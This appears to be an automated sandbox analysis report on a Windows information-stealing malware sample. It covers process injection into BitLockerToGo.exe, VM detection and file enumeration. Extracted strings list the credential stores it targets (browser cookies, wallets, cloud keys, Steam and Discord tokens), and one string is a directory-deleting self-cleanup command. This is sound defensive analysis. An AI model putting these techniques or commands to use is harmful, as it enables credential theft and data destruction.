              Source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeVirustotal: Detection: 32%
              Source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeReversingLabs: Detection: 35%
              Source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeString found in binary or memory: net/addrselect.go
              Source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeString found in binary or memory: github.com/saferwall/pe@v1.5.6/loadconfig.go
              Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2888 --field-trial-handle=2712,i,1009014025995449760,7047776707650769861,262144 /prefetch:8
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2888 --field-trial-handle=2712,i,1009014025995449760,7047776707650769861,262144 /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeStatic file information: File size 6504448 > 1048576
              Source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2eea00
              Source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x2c8800
              Source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2comctl32gdi32:225121Windows 11HTTP/1.1HARDWARE\DESCRIPTION\System\CentralProcessor\0abcdefgh
              Source: Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbA source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000003.2202609846.000000000A46A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2206546529.000000000A47A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2205879339.000000000A1B2000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.3074742779.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: Binary string: vdr1.pdb source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000003.2202609846.000000000A46A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2206546529.000000000A47A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2205879339.000000000A1B2000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000004.00000002.3074742779.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdb source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2206109646.000000000A35C000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cryptosetup.pdbGCTL source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp, ctr1d2.4.dr
              Source: Binary string: cryptosetup.pdb source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp, ctr1d2.4.dr
              Source: Binary string: BitLockerToGo.pdbGCTL source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2206109646.000000000A35C000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000003.2202609846.000000000A46A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2206546529.000000000A47A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2205879339.000000000A1B2000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000004.00000002.3074742779.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_0040E886
              Source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeStatic PE information: section name: .symtab
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\im7gd\ctr1d2Jump to dropped file
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\im7gd\ctr1d2Jump to dropped file
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\im7gd\ctr1d2Jump to dropped file
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_0040E886
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\ProgramData\im7gd\ctr1d2Jump to dropped file
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_4-11542
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00407891 FindFirstFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindNextFileA,FindClose,4_2_00407891
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040A69C FindFirstFileA,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,4_2_0040A69C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00408776 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_00408776
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004013DA FindFirstFileA,FindNextFileA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindNextFileA,FindClose,4_2_004013DA
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00406784 ExpandEnvironmentStringsA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_00406784
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00411187 wsprintfA,FindFirstFileA,memset,memset,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,4_2_00411187
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00412A5D wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00412A5D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00409C78 wsprintfA,FindFirstFileA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,4_2_00409C78
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00408224 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00408224
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00413B10 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindNextFileA,FindNextFileA,FindClose,4_2_00413B10
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00412539 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,4_2_00412539
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00411BD2 wsprintfA,FindFirstFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_00411BD2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00411722 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,4_2_00411722
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040DF8C GetSystemInfo,wsprintfA,4_2_0040DF8C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: chrome.exe, 00000006.00000002.2721427722.000042E800B1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
              Source: chrome.exe, 00000006.00000002.2726357615.000042E8010AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D18000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: chrome.exe, 00000006.00000002.2722099722.000042E800C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=80b78494-fd9f-4dfd-9347-f1f0e604466e
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
              Source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2204396608.000000000127E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: chrome.exe, 00000006.00000002.2711075325.000001D6E3DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllff
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_4-12141
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_4-12235
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_4-11847
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_0040E886
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040D84A lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrcpyA,lstrcatA,4_2_0040D84A

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and writeJump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5AJump to behavior
              Searches for specific processes (likely to inject)
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040F0CA CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,4_2_0040F0CA
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040F029 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle,4_2_0040F029
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 289C008Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 419000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 41D000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 41F000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 420000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 421000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,4_2_0040DE1C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
